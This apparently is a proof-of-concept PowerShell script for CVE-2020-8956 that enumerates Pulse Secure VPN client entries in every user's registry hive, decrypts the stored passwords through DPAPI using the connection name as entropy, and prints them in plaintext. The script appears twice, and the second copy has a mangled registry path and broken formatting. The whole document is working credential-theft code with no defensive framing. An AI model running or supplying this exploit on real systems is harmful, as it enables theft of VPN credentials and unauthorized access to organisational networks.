qkaiser/CVE-2020-8956.ps1

## CVE-2020-8956.ps1
Add-Type -AssemblyName System.Security;

$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
    $ivename = $ive.PSPath.split('\')[-1].ToUpper()
    Write-Host "[+] Checking IVE $($ivename)..."
    $seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
    # 3 possible value names for password
    $encrypted = $ive.Password1
    if(!$encrypted){
        $encrypted = $ive.Password2
    }
    if(!$encrypted){
        $encrypted = $ive.Password3
    }
    $plaintext = [Text.Encoding]::Unicode.GetString([Security.Cryptography.ProtectedData]::Unprotect($encrypted, $seed, 'CurrentUser'))
    Write-Host "[+] Password is $($plaintext)"
}
	Add-Type -AssemblyName System.Security;

	$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\\Software\Pulse Secure\Pulse\User Data\'
	foreach($ive in $ives) {
	$ivename = $ive.PSPath.split('\')[-1].ToUpper()
	Write-Host "[+] Checking IVE $($ivename)..."
	$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
	# 3 possible value names for password
	$encrypted = $ive.Password1
	if(!$encrypted){
	$encrypted = $ive.Password2
	}
	if(!$encrypted){
	$encrypted = $ive.Password3
	}
	$plaintext = [Text.Encoding]::Unicode.GetString([Security.Cryptography.ProtectedData]::Unprotect($encrypted, $seed, 'CurrentUser'))
	Write-Host "[+] Password is $($plaintext)"
	}